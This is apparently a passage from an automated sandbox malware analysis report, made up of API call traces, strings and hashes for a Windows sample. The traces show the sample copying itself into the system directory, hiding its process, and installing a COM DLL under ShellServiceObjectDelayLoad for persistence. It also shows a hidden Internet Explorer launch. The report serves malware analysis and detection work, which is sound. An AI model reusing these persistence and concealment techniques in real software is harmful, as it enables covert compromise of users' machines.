40138a RegSetValueExA RegCloseKey 2704->2705 2706 401386 
2704->2706 2705->2706 2706->2696

                            Control-flow Graph

                            APIs
                            • OpenMutexA.KERNEL32(001F0001,00000000,QueenKarton_12), ref: 00406C50
                            • CloseHandle.KERNEL32(00000000,00000000), ref: 00406C60
                            • exit.CRTDLL(00000001,00000000,00000000), ref: 00406C67
                            • GetVersionExA.KERNEL32(00418D50,00000000), ref: 00406C8A
                            • GetSystemDirectoryA.KERNEL32(00429080,000000FF), ref: 00406C99
                            • GetTickCount.KERNEL32 ref: 00406C9E
                            • srand.CRTDLL(00000000,00418D50,00000000), ref: 00406CA4
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00418D50,00000000), ref: 00406CBE
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D03
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D2F
                            • rand.CRTDLL(00418D50,00000000), ref: 00406D70
                            • sprintf.CRTDLL(?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00406DA8
                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00406DBD
                            • WinExec.KERNEL32(?,00000000), ref: 00406DEC
                            • ExitProcess.KERNEL32(00000001,?,?,?,?,?,?,00418D50,00000000), ref: 00406E02
                            • sprintf.CRTDLL(00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E1B
                            • sprintf.CRTDLL(00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E3A
                            • sprintf.CRTDLL(00408020,%s\%s,00429080,dnkkq.dll,00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406E53
                            • LoadCursorA.USER32(00000000,00007F00), ref: 00406E85
                            • LoadIconA.USER32(00000000,00007F03), ref: 00406E9A
                            • GetStockObject.GDI32(00000000), ref: 00406EA8
                            • RegisterClassA.USER32(00000003), ref: 00406EC9
                            • CreateWindowExA.USER32(00000000,QueenKarton,QueenKarton,00CA0000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00408020), ref: 00406EF3
                            • CreateMutexA.KERNEL32(00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll,00428F60,%s\%s,00429080,kkq32.vxd,00418E30,%s\%s,00429080,kkq32.dll,00418D50,00000000), ref: 00406F12
                              • Part of subcall function 00402E06: GetVersion.KERNEL32 ref: 00402E22
                              • Part of subcall function 00402E06: GlobalMemoryStatus.KERNEL32(?), ref: 00402F9F
                              • Part of subcall function 00402E06: CloseHandle.KERNEL32(?), ref: 00403065
                            • GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll,00418D50,00000000), ref: 00406F21
                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll,00418D50,00000000), ref: 00406F32
                            • GetProcAddress.KERNEL32(00000000,RegisterServiceProcess), ref: 00406F3D
                            • GetCurrentProcessId.KERNEL32(00000000,RegisterServiceProcess,kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,00429080,kkq32.dll), ref: 00406F57
                            • CreateThread.KERNEL32(00000000,00000000,0040682B,00000000,00000000,?), ref: 00406F84
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,0040682B,00000000,00000000,?), ref: 00406F8A
                            • CreateThread.KERNEL32(00000000,00000000,004068B0,00000000,00000000,?), ref: 00406FA3
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,004068B0,00000000,00000000,?,00000000,00000000,00000000,0040682B,00000000,00000000,?), ref: 00406FA9
                            • SetTimer.USER32(00000001,000001F4,00000000,00000000), ref: 00406FBD
                            • TranslateMessage.USER32(?), ref: 00406FC8
                            • DispatchMessageA.USER32(?), ref: 00406FD7
                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00406FE6
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1986338181.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1986305322.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986418950.000000000042E000.00000020.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986471644.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986516126.0000000000436000.00000020.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986550435.0000000000438000.00000002.00000001.01000000.0000000C.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_Odekfoij.jbxd
                            Yara matches
                            Similarity
                            • API ID: Handle$CloseCreatesprintf$MessageVersionrand$FileLoadModuleMutexProcessThread$AddressClassCopyCountCurrentCursorDirectoryDispatchExecExitGlobalIconMemoryNameObjectOpenProcRegisterStatusStockSystemTickTimerTranslateWindowexitsrand
                            • String ID: %s\%s$%s\%s.exe$2$3$QueenKarton$QueenKarton_12$RegisterServiceProcess$dnkkq.dll$kernel32.dll$kkq32.dll$kkq32.vxd
                            • API String ID: 607501245-2841515530
                            • Opcode ID: 47dc35882da9e6d4dfe293ecc6690f52e81bb2b6ce91e07ac91a2883a2b15265
                            • Instruction ID: b1e00ee85c63859ee3f052cf9651ba5d7fc827d99c5bd6e2bd8f21b679fb6b98
                            • Opcode Fuzzy Hash: 47dc35882da9e6d4dfe293ecc6690f52e81bb2b6ce91e07ac91a2883a2b15265
                            • Instruction Fuzzy Hash: E691C671F883286ADB10A7759C46FDD76A85B44704F5000BBB508FB2C2D6FC6D448BAE

                            Control-flow Graph

                            control_flow_graph (rendered as an image in the original report, with executed and not-executed blocks colour-coded): basic blocks 403619-4036b2, calling CreateFileA, GetFileSize, LocalAlloc, ReadFile and CloseHandle.
                            APIs
                            • CreateFileA.KERNEL32(69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403642
                            • GetFileSize.KERNEL32(00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403667
                            • LocalAlloc.KERNEL32(00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72), ref: 00403674
                            • ReadFile.KERNEL32(00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000), ref: 0040369A
                            • CloseHandle.KERNEL32(00000000,00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080), ref: 004036A6
                            Memory Dump Source
                            • Source File: 00000009.00000002.1986338181.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1986305322.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986418950.000000000042E000.00000020.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986471644.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986516126.0000000000436000.00000020.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986550435.0000000000438000.00000002.00000001.01000000.0000000C.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_Odekfoij.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AllocCloseCreateHandleLocalReadSize
                            • String ID:
                            • API String ID: 2632956699-0
                            • Opcode ID: dd1227ad1f3452ee8fc35f5791aff0d34791abb0994a93554c87423cd4fa6a6f
                            • Instruction ID: fb77f57afc793f1fdbd914af7197191687e2a95eac13cef646675694312e246c
                            • Opcode Fuzzy Hash: dd1227ad1f3452ee8fc35f5791aff0d34791abb0994a93554c87423cd4fa6a6f
                            • Instruction Fuzzy Hash: 14116531A00208BAEB216E65CC06F9DB7A8DB00765F108576FA10BA2D1D67DAF018B5D

                            Control-flow Graph

                            APIs
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00403FA7
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00403FD4
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3), ref: 00404010
                            • sprintf.CRTDLL(?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404048
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404063
                            • sprintf.CRTDLL(Ojacofgb,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll,00429080,?,00000001,69D4CE72,10624DD3), ref: 00404086
                            • WriteFile.KERNEL32(?,0042AA84,00001A01,?,00000000,Ojacofgb,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?,%s\%s.dll), ref: 004040A4
                            • CloseHandle.KERNEL32(?,?,0042AA84,00001A01,?,00000000,Ojacofgb,00429080,?,40000000,00000000,00000000,00000002,00000000,00000000,?), ref: 004040BB
                            • sprintf.CRTDLL(?,CLSID\%s\InProcServer32,{79FEACFF-FFCE-815E-A900-316290B5B738},?,?,0042AA84,00001A01,?,00000000,Ojacofgb,00429080,?,40000000,00000000,00000000,00000002), ref: 004040D3
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1986338181.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1986305322.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986418950.000000000042E000.00000020.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986471644.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986516126.0000000000436000.00000020.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986550435.0000000000438000.00000002.00000001.01000000.0000000C.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_Odekfoij.jbxd
                            Yara matches
                            Similarity
                            • API ID: randsprintf$File$CloseCreateHandleWrite
                            • String ID: %s\%s.dll$2$3$Apartment$CLSID\%s\InProcServer32$Ojacofgb$Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad$ThreadingModel$Web Event Logger${79FEACFF-FFCE-815E-A900-316290B5B738}
                            • API String ID: 4269242784-3032070440
                            • Opcode ID: 5b9226bc97ce31b3811795df607ed7bbed4fe58e3f2db61338cee063268ccacc
                            • Instruction ID: 8034dccab87c86b1e0d8b3b5755954c703eafec793446a3a0ea57bc4b4fc6a7a
                            • Opcode Fuzzy Hash: 5b9226bc97ce31b3811795df607ed7bbed4fe58e3f2db61338cee063268ccacc
                            • Instruction Fuzzy Hash: E7415771F482286AD7109769EC46BE97AAC8B49304F5400FBB908F72C1D6FC9E458F69

                            Control-flow Graph

                            APIs
                            • rand.CRTDLL(00000001,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00403CFD
                            • memcpy.CRTDLL(-0042AA50,?,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080,?,00418D50,00000000), ref: 00403D7A
                            • memset.CRTDLL(00406DCE,00000000,0000000C,-0042AA50,?,69D4CE72,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe,00429080), ref: 00403D8F
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403DF6
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403DFE
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403E1F
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403E27
                            • memcpy.CRTDLL(-0042AA4C,0042AA44,00000040,?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE), ref: 00403E52
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1986338181.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1986305322.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986418950.000000000042E000.00000020.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986471644.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986516126.0000000000436000.00000020.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986550435.0000000000438000.00000002.00000001.01000000.0000000C.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_Odekfoij.jbxd
                            Yara matches
                            Similarity
                            • API ID: rand$memcpy$memset
                            • String ID: +Z})
                            • API String ID: 1341957784-4018127762
                            • Opcode ID: 2b8c7437e1bd7430af5d83ecd7967c4870ae419bfa933bb167626543e718b489
                            • Instruction ID: df63eb390851271c68cbd719fcc6126871763b87c01c507511359465d0d2d2d2
                            • Opcode Fuzzy Hash: 2b8c7437e1bd7430af5d83ecd7967c4870ae419bfa933bb167626543e718b489
                            • Instruction Fuzzy Hash: A4719E31F042159BCB10CF69DD42A9E7BF5AF88354F584076E901B77A0D23CAA16CBAD

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 69 404148-404190 RegCreateKeyExA 70 404193-404198 69->70 70->70 71 40419a-4041c2 RegSetValueExA RegCloseKey 70->71
                            APIs
                            • RegCreateKeyExA.ADVAPI32(69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72,00000001,00006A14,{79FEACFF-FFCE-815E-A900-316290B5B738},?,?,?,004040F5), ref: 00404189
                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,00429080,69D4CE72,69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72,00000001), ref: 004041AB
                            • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00429080,69D4CE72,69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72), ref: 004041B9
                            Strings
                            • {79FEACFF-FFCE-815E-A900-316290B5B738}, xrefs: 0040414D
                            Memory Dump Source
                            • Source File: 00000009.00000002.1986338181.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1986305322.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986418950.000000000042E000.00000020.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986471644.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986516126.0000000000436000.00000020.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986550435.0000000000438000.00000002.00000001.01000000.0000000C.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_Odekfoij.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID: {79FEACFF-FFCE-815E-A900-316290B5B738}
                            • API String ID: 1818849710-4250702572
                            • Opcode ID: 0b9791cc2bb803e0a6fddded9d2feb4d7971cdb144d1b8de1133cc46446009fc
                            • Instruction ID: 412fd7a6ac4860a679fa2010a2fd1b93dd732dea722ee027fa7473d1befc18ea
                            • Opcode Fuzzy Hash: 0b9791cc2bb803e0a6fddded9d2feb4d7971cdb144d1b8de1133cc46446009fc
                            • Instruction Fuzzy Hash: A7018472B00108BBEB114A95CC02FFEBA6AEF44764F250065FA00B71D1C6B1AE519754

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 72 40365e-403682 GetFileSize LocalAlloc 74 403684-40368a 72->74 75 40368c-40368f 72->75 76 403692-4036b2 ReadFile CloseHandle 74->76 75->76
                            APIs
                            • GetFileSize.KERNEL32(00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403667
                            • LocalAlloc.KERNEL32(00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72), ref: 00403674
                            • ReadFile.KERNEL32(00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000), ref: 0040369A
                            • CloseHandle.KERNEL32(00000000,00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080), ref: 004036A6
                            Memory Dump Source
                            • Source File: 00000009.00000002.1986338181.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1986305322.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986418950.000000000042E000.00000020.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986471644.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986516126.0000000000436000.00000020.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986550435.0000000000438000.00000002.00000001.01000000.0000000C.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_Odekfoij.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$AllocCloseHandleLocalReadSize
                            • String ID:
                            • API String ID: 341201350-0
                            • Opcode ID: 2fd491c6994b402e35e8b9e545411a472b55f40d1e3a5e6431fc85953c0e0c00
                            • Instruction ID: f40f052c398d65a7c82f7348c4b70b1bbd35af8546e58ac1d0fc8a8e918c22c0
                            • Opcode Fuzzy Hash: 2fd491c6994b402e35e8b9e545411a472b55f40d1e3a5e6431fc85953c0e0c00
                            • Instruction Fuzzy Hash: 4EF01C76F04504BAEB01ABA58C02BDD77789B04319F108467F604B62C1D27D6B119B6E

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 78 407980-40798f GetCommandLineA 79 407991-4079a4 strchr 78->79 80 4079b4-4079b9 78->80 81 4079a6-4079a9 79->81 82 4079cf-4079dc GetModuleHandleA call 406c29 79->82 83 4079c0 80->83 84 4079bb-4079be 80->84 86 4079ac-4079af 81->86 89 4079e1-4079e3 82->89 88 4079c3-4079c8 83->88 84->83 87 4079b3 84->87 90 4079b1 86->90 91 4079ab 86->91 87->80 88->82 92 4079ca-4079cd 88->92 90->82 91->86 92->82 93 4079c2 92->93 93->88
                            APIs
                            • GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                            • strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                            • GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            Memory Dump Source
                            • Source File: 00000009.00000002.1986338181.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1986305322.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986418950.000000000042E000.00000020.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986471644.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986516126.0000000000436000.00000020.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986550435.0000000000438000.00000002.00000001.01000000.0000000C.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_Odekfoij.jbxd
                            Yara matches
                            Similarity
                            • API ID: CommandHandleLineModulestrchr
                            • String ID:
                            • API String ID: 2139856000-0
                            • Opcode ID: a85f45691ed6f3240fb139f31581347a401a2e524d65f22663fdacfbc6ab9f8e
                            • Instruction ID: bd194e91918afd51b414fff694719a57869652e1cfdb10064340714cce8cfdd4
                            • Opcode Fuzzy Hash: a85f45691ed6f3240fb139f31581347a401a2e524d65f22663fdacfbc6ab9f8e
                            • Instruction Fuzzy Hash: 98F062D1E2C28124FF3162764C4673FAD8A9782754F281477E482F62C2E5BCAD52922B

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 94 401219 95 40121f-40127f __GetMainArgs call 407980 94->95 97 401284-401293 exit 95->97
                            APIs
                            • __GetMainArgs.CRTDLL(0042A020,0042A024,0042A028,00000000,00000000), ref: 00401262
                              • Part of subcall function 00407980: GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                              • Part of subcall function 00407980: strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                              • Part of subcall function 00407980: GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            • exit.CRTDLL(00000000), ref: 0040128D
                            Memory Dump Source
                            • Source File: 00000009.00000002.1986338181.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1986305322.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986418950.000000000042E000.00000020.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986471644.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986516126.0000000000436000.00000020.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986550435.0000000000438000.00000002.00000001.01000000.0000000C.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_Odekfoij.jbxd
                            Yara matches
                            Similarity
                            • API ID: ArgsCommandHandleLineMainModuleexitstrchr
                            • String ID:
                            • API String ID: 735354517-0
                            • Opcode ID: 4cf7b12bb1780c75f300c3ebf2e5b3677e9a846ab4eef9a36478d9a0a8233563
                            • Instruction ID: 1ee26eb31ace3a5089fdf6d32769bdd241f616d51084a453fd18da055c90a8b4
                            • Opcode Fuzzy Hash: 4cf7b12bb1780c75f300c3ebf2e5b3677e9a846ab4eef9a36478d9a0a8233563
                            • Instruction Fuzzy Hash: 52F09670F44300BBDB206F55DD03F167AA8EB08F1CF90002AFA44611D1D67D6420569F

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 98 40121f-40127f __GetMainArgs call 407980 100 401284-401293 exit 98->100
                            APIs
                            • __GetMainArgs.CRTDLL(0042A020,0042A024,0042A028,00000000,00000000), ref: 00401262
                              • Part of subcall function 00407980: GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                              • Part of subcall function 00407980: strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                              • Part of subcall function 00407980: GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            • exit.CRTDLL(00000000), ref: 0040128D
                            Memory Dump Source
                            • Source File: 00000009.00000002.1986338181.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1986305322.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986418950.000000000042E000.00000020.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986471644.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986516126.0000000000436000.00000020.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986550435.0000000000438000.00000002.00000001.01000000.0000000C.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_Odekfoij.jbxd
                            Yara matches
                            Similarity
                            • API ID: ArgsCommandHandleLineMainModuleexitstrchr
                            • String ID:
                            • API String ID: 735354517-0
                            • Opcode ID: 3b2f29dedebab105fe7e3300aa923db6c3c370c5ed425738ec8fc91bc5ecbfbb
                            • Instruction ID: 22fee5bca0d1ee63cc250ffe024ab50772efda8fe48dde45178863df2fdfff2b
                            • Opcode Fuzzy Hash: 3b2f29dedebab105fe7e3300aa923db6c3c370c5ed425738ec8fc91bc5ecbfbb
                            • Instruction Fuzzy Hash: BEF090B0F44300BBDA206F55AC03F1A7AA8EB08B1CFA0002AFA44611E1DA7D6420569F
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405C3C
                            • GetTickCount.KERNEL32 ref: 00405C54
                            • srand.CRTDLL(00000000,?), ref: 00405C5A
                            • InterlockedIncrement.KERNEL32(0042C48C), ref: 00405C69
                            • memset.CRTDLL(?,00000000,00000010,0042C48C,00000000,?), ref: 00405C7F
                              • Part of subcall function 0040429C: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,00000000,?), ref: 00405CC2
                              • Part of subcall function 0040570C: GetTempPathA.KERNEL32(00000104,?), ref: 00405730
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,.htm), ref: 00405764
                              • Part of subcall function 0040570C: sprintf.CRTDLL(?,<html>), ref: 00405778
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 00405786
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 004057A4
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057AC
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057BE
                              • Part of subcall function 0040570C: sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 004057DF
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057E7
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 00405805
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,<head>), ref: 00405819
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 00405827
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 00405845
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 0040584D
                            • strcat.CRTDLL(?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405CF7
                            • strcat.CRTDLL(?,?,?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405D0A
                              • Part of subcall function 0040431F: GetCurrentThreadId.KERNEL32 ref: 00404341
                              • Part of subcall function 0040431F: GetThreadDesktop.USER32(00000000), ref: 00404347
                            • memset.CRTDLL(?,00000000,00000044,?,?,?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405D2B
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405D95
                            • CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405DA8
                            • sprintf.CRTDLL(?,%s%u - Microsoft Internet Explorer,MicroSoft-Corp,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405DCA
                            • FindWindowA.USER32(IEFrame,?), ref: 00405DED
                            • Sleep.KERNEL32(000003E8,IEFrame,?,00000000,00000000,00000044,?,?,?,?,?,?,?,?,?,?), ref: 00405DFD
                            • Sleep.KERNEL32(0000F000,IEFrame,?,00000000,00000000,00000044,?,?,?,?,?,?,?,?,?,?), ref: 00405E20
                            • GetWindowTextA.USER32(00000000,?,00000104), ref: 00405E38
                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00405E85
                            • DeleteFileA.KERNEL32(?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405EA4
                            • lstrlenA.KERNEL32(<HTML><!--,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405EAE
                            • strncmp.CRTDLL(00000000,<HTML><!--,00000000,<HTML><!--,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000), ref: 00405EBA
                            • lstrlenA.KERNEL32(<HTML><!--,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405ECB
                            • LocalFree.KERNEL32(00000000,?,?,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000), ref: 00405F0F
